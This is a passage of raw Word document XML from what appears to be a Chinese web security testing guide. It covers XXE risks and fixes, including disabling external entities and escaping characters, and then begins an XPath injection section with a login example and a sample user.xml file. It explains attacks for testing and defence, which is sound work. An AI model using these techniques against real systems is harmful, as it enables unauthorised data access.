      </w:r>
      <w:r w:rsidR="006B70A7" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="006B70A7" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中声明</w:t>
      </w:r>
      <w:r w:rsidR="006B70A7" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URI</w:t>
      </w:r>
      <w:r w:rsidR="006B70A7" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向服务器本地的实体造成攻击。实体攻击可导致信息泄露、任意文件读取、</w:t>
      </w:r>
      <w:r w:rsidR="006B70A7" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidR="006B70A7" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击和代码执行等问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542C51E9" w14:textId="77777777" w:rsidR="001A7A0B" w:rsidRPr="00B33530" w:rsidRDefault="001A7A0B" w:rsidP="00B33530">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434F3994" w14:textId="63C2F49F" w:rsidR="001A7A0B" w:rsidRPr="00B33530" w:rsidRDefault="008E64CF" w:rsidP="00B33530">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：实体注入可读取服务器文件或执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5160BCC1" w14:textId="77777777" w:rsidR="001A7A0B" w:rsidRPr="00B33530" w:rsidRDefault="001A7A0B" w:rsidP="00B33530">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFA9CB4" w14:textId="77777777" w:rsidR="00E72018" w:rsidRPr="00B33530" w:rsidRDefault="00E72018" w:rsidP="00B33530">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>严格检查用户输入的字符；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A6B87" w14:textId="77777777" w:rsidR="00E72018" w:rsidRPr="00B33530" w:rsidRDefault="00E72018" w:rsidP="00B33530">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用的底层</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析库，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言提供的禁用外部实体的方法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Document</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>BuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DBCE1D" w14:textId="77777777" w:rsidR="00E72018" w:rsidRPr="00B33530" w:rsidRDefault="00E72018" w:rsidP="00B33530">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时对格式字符进行转义处理，常见的格式字符如下表：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>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4151"/>
        <w:gridCol w:w="4151"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E72018" w:rsidRPr="00B33530" w14:paraId="260F6890" w14:textId="77777777" w:rsidTr="00936DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="237F37F5"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lt</w:t>
            </w:r>
            <w:r w:rsidRPr="00B33530">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="62926A93"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lt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E72018" w:rsidRPr="00B33530" w14:paraId="3846DA35" w14:textId="77777777" w:rsidTr="00936DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="382B2A04"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gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6AF79CCA"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gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E72018" w:rsidRPr="00B33530" w14:paraId="6C33CE28" w14:textId="77777777" w:rsidTr="00936DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="112E0198"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amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2CFFCBA2"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E72018" w:rsidRPr="00B33530" w14:paraId="2114929D" w14:textId="77777777" w:rsidTr="00936DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1A78B93D"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apos;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2467116F"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rPr>
              <w:t>‘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E72018" w:rsidRPr="00B33530" w14:paraId="24A10C64" w14:textId="77777777" w:rsidTr="00936DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2D4948DC"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quot;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6F7CDFC2"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rPr>
              <w:t>“</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62BBFF2B" w14:textId="2630799C" w:rsidR="001A7A0B" w:rsidRPr="00B33530" w:rsidRDefault="00B44623" w:rsidP="00B33530">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EC7E15A" w14:textId="38AEE68E" w:rsidR="001A7A0B" w:rsidRPr="00F757E4" w:rsidRDefault="009C1845" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc498434562"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="001C247E">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r w:rsidR="001A7A0B" w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="7A9B29F8" w14:textId="3830D04B" w:rsidR="00661A78" w:rsidRPr="00F43721" w:rsidRDefault="001A7A0B" w:rsidP="00F43721">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击是指利用</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XPath </w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析器的松散输入和容错特性，能够在</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、表单或其它信息上附带恶意的</w:t>
      </w:r>
      <w:r w:rsidR="00FC5D1A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="00FC5D1A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询代码，以获得权限信息的访问权并更改这些信息。</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击是针对</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务应用新的攻击方法，它允许攻击者在事先不知道</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询相关知识的情况下，通过</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询得到一个</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="00661A78" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档的完整内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB12F6F" w14:textId="2008456E" w:rsidR="00F04B45" w:rsidRPr="00F43721" w:rsidRDefault="001A7A0B" w:rsidP="00F43721">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击主要是通过构建特殊的输入，这些输入往往是</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法中的</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>一些组合，这些输入将作为参数传入</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序，通过执行</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询而执行入侵者想要的操作，下面以登录验证中的模块为例，说明</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击的实现原理和检测方法，在</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序的登录验证程序中，一般有用户名（</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和密码（</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）两个参数，程序会通过用户所提交输入的用户名和密码来执行授权操作。若验证数据存放在</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中，其原理是通过查找</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表中的用户名（</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和密码（</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的结果来进行授权访问，例存在</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user.xml</w:t>
      </w:r>
      <w:r w:rsidR="00F04B45" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件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04B45" w:rsidRPr="00F43721" w14:paraId="00D5C9C1" w14:textId="77777777" w:rsidTr="00936DFE">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75A8B7"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lt;users&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D643D5"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p w14:paraId="31F50391"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firstname&gt;Ben&lt;/firstname&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F96AC91"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astname&gt;Elmore&lt;/lastname&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7266F6D0"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oginID&gt;abc&lt;/loginID&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="731775FB"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password&gt;test123&lt;/password&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66161817"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p w14:paraId="78A71892"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p w14:paraId="3D66A0A9"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firstname&gt;Shlomy&lt;/firstname&gt;</w:t>
            </w:r>
          </w:p>
